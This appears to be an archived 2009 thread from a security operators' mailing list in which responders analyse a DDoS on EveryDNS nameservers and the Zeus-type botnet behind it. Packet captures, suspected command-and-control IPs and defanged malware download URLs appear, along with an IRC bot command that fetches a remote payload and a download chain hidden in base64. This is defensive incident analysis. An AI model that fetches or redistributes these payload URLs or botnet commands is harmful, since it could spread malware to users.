[nsp-sec] DDoS to EveryDNS nameserver IPs
Stephen Gill
gillsr at cymru.com
Wed Feb 4 20:47:19 EST 2009
Indeed, it seems there's quite a bit behind that IP, mostly Web based
botnets of the Zeus flavor.
hxxp://horobl.cn/dll/v.txt
hxxp://rondolook.ru/loadero.exe
hxxp://ontilop.ru/.../in.php
hxxp://rondolook.ru/se2.exe
hxxp://horobl.cn/dll/svch.txt
hxxp://horobl.cn/dll/fo.txt
hxxp://horobl.cn/dll/jud.txt
hxxp://horobl.cn/dll/ger2.txt
hxxp://rondolook.ru/Resultx.exe
hxxp://horobl.cn/st/flag/testik/load.exe
hxxp://rondolook.ru/ftp.exe
hxxp://horobl.cn/dll/aad.txt
hxxp://horobl.cn/dll/ser.txt
hxxp://horobl.cn/dll/gh.txt
hxxp://rondolook.ru/Builld.exe
hxxp://rondolook.ru/l.exe
hxxp://horobl.cn/ex/a.php
hxxp://rondolook.ru/socks1.exe
hxxp://horobl.cn/met/ge.txt
hxxp://ontilop.ru/.../sploits/test.pdf
hxxp://rondolook.ru/Babj.exe
hxxp://ontilop.ru/.../e1.exe
hxxp://rondolook.ru/ch.exe
hxxp://rondolook.ru/loade.exe
hxxp://horobl.cn/dll/top.txt
hxxp://horobl.cn/dll/ger3.txt
hxxp://rondolook.ru/asti1113_4.exe
hxxp://horobl.cn/dll/us.txt
hxxp://rondolook.ru/I20081109A-ch_blowfish-2k_20090105.exe
hxxp://horobl.cn/dll/test.txt
hxxp://horobl.cn/dll/hell.txt
hxxp://goasi.cn/ex/a.php
hxxp://rondolook.ru/loaderop.exe
hxxp://horobl.cn/ex/0032.exe
hxxp://rondolook.ru/pro.exe
hxxp://horobl.cn/dll/ldr.txt
I've attached a quick 1/2 level deep PDF snapshot of the Ips - hopefully
puck will cooperate. If it doesn't I'll post a private URL. If interested
we can pull out all the nodes for easier parsing. It's quite an elaborate
network, and it gets really interesting if you go 1-2 more levels down.
Graph compressed on whitespace to make it easier for smaller screens.
Enjoy!
Cheers,
-- steve
On 2/4/09 6:12 PM, "White, Gerard" <Gerard.White at aliant.ca> wrote:
> Ladies:
>
> irc.zief.pl on TCP/80
>
> JOIN #.364
> PRIVMSG :!get hxxp://horobl.cn/ex/a.php
>
> Name: horobl.cn
> Address: 211.95.79.6 (Note Typo from Below???)
>
> HTTP/1.1 200 OK
> Server: nginx
>
> MD5: dc9f67ae1d175386625c97fcf22c77ab
> 11776 Bytes:
> http://www.virustotal.com/analisis/34c33485e6a0f326bf75b15cd2ae404c
>
>
> Which then triggers:
> GET hxxp://mega/lgate.php?n=<ID>
>
> With a response of:
> HTTP/1.1 200 OK
> Server: nginx
>
> Content-Length: 44
> MCBodHRwOi8vc2V0ZG9jLmNuL2Rsay9jYWUuZXhlIDE=
>
>
> Which decodes to:
> GET hxxp://setdoc.cn/dlk/cae.exe
>
> With a response of:
> HTTP/1.1 200 OK
> Date: Thu, 05 Feb 2009 08:39:36 GMT
> Server: Apache/2.2.3 (CentOS)
> Last-Modified: Tue, 03 Feb 2009 17:54:41 GMT
> ETag: "154000f-1ae00-5d923a40"
> Accept-Ranges: bytes
> Content-Length: 110080
> Connection: close
> Content-Type: application/octet-stream
>
> MD5: deac9c705ed0f4e4c1d0f3c5bb9aa9c1
> http://www.virustotal.com/analisis/2cc2c169bfea6ee56d3298fc853d2355
>
> Uses RSA crypto... drops a file "bogoa.exe"
>
> MD5: 0c524d62abc45d466bd812b091b5d7b0
> http://www.virustotal.com/analisis/a9ae781773cba091485e3863c40c1ab4
>
>
> GW
> 855 - Bell Aliant
>
>
> -----Original Message-----
> From: nsp-security-bounces at puck.nether.net
> [mailto:nsp-security-bounces at puck.nether.net] On Behalf Of Stephen Gill
> Sent: Wednesday, February 04, 2009 7:49 PM
> To: David Ulevitch; nsp-security at puck.nether.net
> Subject: Re: [nsp-sec] DDoS to EveryDNS nameserver IPs
>
> ----------- nsp-security Confidential --------
>
> Supposedly these are the likely C&C candidates after a very helpful
> individual took a brief glance at an infected machine:
>
> 9800 | 211.95.76.6 | UNICOM CHINA UNICOM
> 23898 | 58.65.232.34 | HOSTFRESH-AS-AP HostFresh Internet
>
> I've fired up the malware on our Sandbox to see if it matches up. There
> are
> quie a few varieties of this file and almost 0 AV pick it up.
>
> You can also google for the most recent sample:
>
> SHA1 a5396141cab8b22d9d88b28a814089537dce366a
> MD5 01c3346c241652f43aed8e2149881bfe
>
> Lawrence should have a seccheck now.
>
> PID 1252 204.184.73.43:1168 58.65.232.34:80 ESTABLISHED
> winlogon.exe \??\C:\WINDOWS\SYSTEM32\winlogon.exe
>
> PID 1252 204.184.73.43:1175 211.95.79.6:80 ESTABLISHED
> winlogon.exe \??\C:\WINDOWS\SYSTEM32\winlogon.exe
>
> -- steve
>
>
> On 2/4/09 11:39 AM, "David Ulevitch" <david at opendns.com> wrote:
>
>> ----------- nsp-security Confidential --------
>>
>> I'm currently receiving a large DDoS to all my EveryDNS nameserver
> IPs:
>>
>> ns1.everydns.net has address 208.76.56.56
>> ns2.everydns.net has address 78.129.207.168
>> ns3.everydns.net has address 71.6.202.220
>> ns4.everydns.net has address 208.96.6.134
>>
>> The DDoS appears to all be UDP packets of length 1000 bytes.
>>
>> Here's what I mean:
>>
>> 01:39:20.107917 IP 115.186.96.138.58798 > 208.76.56.56.2194: UDP,
>> length 1000
>> 01:39:20.107959 IP 82.212.143.159.2270 > 208.76.56.56.4000: UDP,
>> length 1000
>> 01:39:20.107969 IP 187.10.195.160.60001 > 208.76.56.56.2105: UDP,
>> length 1000
>> 01:39:20.107986 IP 189.119.47.137.25664 > 208.76.56.56.908: UDP,
>> length 1000
>> 01:39:20.107991 IP 213.189.175.47.3732 > 208.76.56.56.3804: UDP,
>> length 1000
>> 01:39:20.108012 IP 202.41.85.244.22349 > 208.76.56.56.3119: UDP,
>> length 1000
>> 01:39:20.108089 IP 89.174.93.234.4675 > 208.76.56.56.3589: UDP, length
>> 1000
>>
>> Anyone know what this looks like or anything I can do to stop it...
>>
>> 3 of the 4 nameservers are offline right now, and I'm working with
>> some folks to bring up some more machines now. Ironically, I'm at the
>> ICANN DNS meeting at GATech right now with a bunch of you. :-)
>>
>> Thanks,
>> David Ulevitch
>> 415 971 6916
>>
>>
>> _______________________________________________
>> nsp-security mailing list
>> nsp-security at puck.nether.net
>> https://puck.nether.net/mailman/listinfo/nsp-security
>>
>> Please do not Forward, CC, or BCC this E-mail outside of the
> nsp-security
>> community. Confidentiality is essential for effective Internet
> security
>> counter-measures.
>> _______________________________________________
--
Stephen Gill, Chief Scientist, Team Cymru
http://www.cymru.com | +1 312 924 4023 | gillsr at cymru.com
More information about the nsp-security
mailing list